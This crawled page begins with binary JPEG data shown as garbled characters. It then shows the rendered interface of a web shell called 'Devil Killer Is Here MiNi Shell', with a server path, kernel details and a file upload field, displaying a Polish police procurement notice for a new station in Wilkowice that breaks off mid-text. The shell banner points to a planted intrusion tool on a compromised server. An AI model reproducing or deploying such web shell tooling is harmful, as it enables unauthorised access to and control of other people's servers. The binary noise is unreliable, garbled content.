JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170919/590463-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 590463-N-2017 z dnia 2017-09-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Komenda Wojewódzka Policji w Katowicach</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">ZP-2380-387-40/2017 Budowa nowej siedziby Posterunku Policji w Wilkowicach postępowanie nr 2 </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Komenda Wojewódzka Policji w Katowicach</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27020829200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. J. Lompy</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">19</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">40038 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Katowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 002 050</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@slaska.policja.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 002 060</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.katowice.kwp.policja.gov.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.katowice.kwp.policja.gov.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012r. Prawo Pocztowe, osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Komenda Wojewódzka Policji w Katowicach, ul. Lompy 19, 40-038 Katowice, Zespół zamówień publicznych, Sekretariat blok A, parter</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">ZP-2380-387-40/2017 Budowa nowej siedziby Posterunku Policji w Wilkowicach postępowanie nr 2 </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP-2380-387-40/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest wybudowanie nowej siedziby Posterunku Policji w Wilkowicach wraz zzagospodarowaniem terenu oraz niezbędną infrastrukturą techniczną i drogową oraz zjazdu zgodnie zdokumentacją projektową . 2. Szczegółowy opis przedmiotu zamówienia znajduje się w: a) projektumowy załączniku nr 2 do SIWZ - projekt umowy; b) przedmiar robót - załącznik nr 6 do SIWZ c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 7 do SIWZ d) dokumentacjaprojektowa - załącznik nr 8 do SIWZ 3. Zamawiający wymaga aby gwarancja na wykonane robotybudowlane wynosiła minimum 36 miesięcy licząc od dnia odbioru końcowego oraz Zamawiającywymaga aby udzielona gwarancja na zamontowany sprzęt była wystawiona na okres równy gwarancjiproducenta, który ma wynosić minimum 24 miesiące, licząc od daty odbioru obiektu przezZamawiającego. 4. Zamawiający dopuszcza możliwość zastosowania technologii (systemu) materiałówrównoważnych. Wykazanie równoważności technologii, systemów materiałów (zgodnie z art. 30 ust. 5 ustawy Pzp) spoczywa na Wykonawcy. W przypadku zaoferowania technologii (systemu) materiałówrównoważnych Wykonawca musi wraz z formularzem ofertowym i kosztorysem przedstawić oferowanątechnologię (system), materiały, z określeniem typu zastosowanych technologii (systemu) materiałóworaz dołączyć materiały dokumentujące parametry techniczne i analizę porównawczą, z którychjednoznacznie wynikało będzie, że są one w pełni równoważne do technologii (systemu) materiałówwskazanych w dokumentacji. Zaproponowane systemy i materiały równoważne powinny posiadaćwymagane prawem świadectwa, certyfikaty, dopuszczenia do stosowania w budownictwie, oraz spełniaćwymagania określone w dokumentacji. 5. Zamawiający dopuszcza podwykonawców. W przypadku gdyWykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, którezamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 1 inr 3 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i we wrorzeumowy (załącznik nr 2 do SIWZ). 6. Na podstawie art. 29 ust. 3a ustawy Pzp Zamawiający wymagazatrudnienia przez Wykonawcę lub podwykonawcę lub dalszego podwykonawcę osób, które wykonująwszelkie czynności wchodzące w tzw. koszty bezpośrednie dla tego zamówienia na podstawie umowy opracę. Tak więc wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane wwykonywaniem przedmiotu zamówienia, czyli tzw. pracowników fizycznych. Wymóg nie dotyczy więc,między innymi osób: kierujących budową, dostawców materiałów budowlanych. 7. W związku zpowyższym Wykonawca musi przed rozpoczęciem wykonywania czynności przez te osoby przedstawićInspektorowi nadzoru oświadczenie Wykonawcy lub podwykonawcy lub dalszego podwykonawcy ozatrudnieniu na podstawie umowy o pracę osób wykonujących czynności bezpośrednio związane zwykonywaniem przedmiotu zamówienia. a) Oświadczenie to powinno zawierać w szczególności:dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, żeczynności związane z realizacją przedmiotu zamówienia wykonują osoby zatrudnione na podstawieumowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu orazpodpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy, podwykonawcy lubdalszego podwykonawcy. b) W odniesieniu do podwykonawców lub dalszych podwykonawcówoświadczenie o którym mowa w Rozdziale I pkt. 10 SIWZ, należy przedłożyć wraz kopią umowy opodwykonawstwo lub dalsze podwykonawstwo jednak nie później niż przed rozpoczęciem wykonywaniaczynności przez te osoby. Bez spełnienia tych wymogów osoby nie będą wpuszczane na plac budowy, awięc nie będą mogły wykonywać pracy z winy Wykonawcy. 8. Nieprzedłożenie przez Wykonawcędokumentów o których mowa w Rozdziale I pkt. 7 SIWZ będzie traktowane jako niewypełnienieobowiązku zatrudnienia pracowników na podstawie umowy o pracę. 9. Zamawiającemu w każdymmomencie realizacji umowy przysługuje prawo do skontrolowania spełniania wymagań przezWykonawcę w zakresie określonym w Rozdziale I pkt. 9 SIWZ. Kontrola dopuszcza wymóg przedłożenia - do wglądu - kopi zanonimizowanych umów o pracę oraz zanonimizowanych dowodówpotwierdzających zgłoszenie pracownika przez pracodawcę do ubezpieczeń potwierdzone za zgodność zoryginałem przez Wykonawcę, podwykonawcę lub dalszego podwykonawcę dla osób, których dotyczyoświadczenie sprecyzowane w w Rozdziale I pkt. 7 SIWZ a) Anonimizacja umów o pracę oraz dowodówpotwierdzających zgłoszenie pracownika przez pracodawcę do ubezpieczeń, powinna zostaćprzeprowadzona w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisamiustawy z dnia 29.08.1997 r. o ochronie danych osobowych (tj. pozbawionych danych osobowychpracowników w szczególności: imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak:data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania.b) W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę lubpodwykonawcę lub dalszego podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroliprzez Państwową Inspekcję Pracy. 10. Zamawiający zastrzega sobie prawo do zmiany kolejnościwykonywanych robót objętych harmonogramem. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">24</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">2 Lata od przekazania placu budowy</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Określenie warunków: a) wykonał jedną robotę budowlaną polegającą na budowie, rozbudowie,nadbudowie lub przebudowie obiektu użyteczności publicznej zawierającą prace murarskie, dekarskie,wykończeniowe, instalacje elektryczne na kwotę 700.000,00 netto. Na potwierdzenie spełnianiawarunku Zamawiający żąda: (1) na podstawie art. 25a ust. 2 ustawy Pzp - dołączenia do ofertyoświadczenia (jednolitego europejskiego dokumentu zamówienia, dalej JEDZ) o spełnieniu tegowarunku - zgodnie ze wzorem stanowiącym załącznik nr 3 i 4 do SIWZ; (2) na podstawie art. 26 ust. 2ustawy pzp - przedstawienia przez Wykonawcę, którego oferta zostanie najwyżej oceniona, nawezwanie Zamawiającego, wykazu robót budowlanych wykonanych nie wcześniej niż w okresieostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te robotybudowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostaływykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami,o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. Wykaz musi potwierdzaćspełnienie warunku udziału w postępowaniu w zakresie określonym w Rozdziale III pkt. 1.2 litera aSIWZ Wzór wykazu stanowi załącznik nr 5 do SIWZ b) dysponuje osobami zdolnymi do pełnieniasamodzielnych funkcji technicznych w budownictwie wymagane przepisami prawa budowlanego zdoświadczeniem 2 lat dla: (1) kierownika budowy w specjalności konstrukcyjno - budowlanej; (2)kierownika robót w specjalności instalacji sanitarnych w zakresie sieci, instalacji i urządzeń cieplnych,wentylacyjnych, wodociągowych i kanalizacyjnych; (3) kierownika robót w specjalności instalacjielektrycznych w zakresie sieci, instalacji i urządzeń elektrycznych. które skierowane zostaną przezWykonawcę do realizacji zamówienia publicznego. Na potwierdzenie spełniania warunkuZamawiający żąda: (1) na podstawie art. 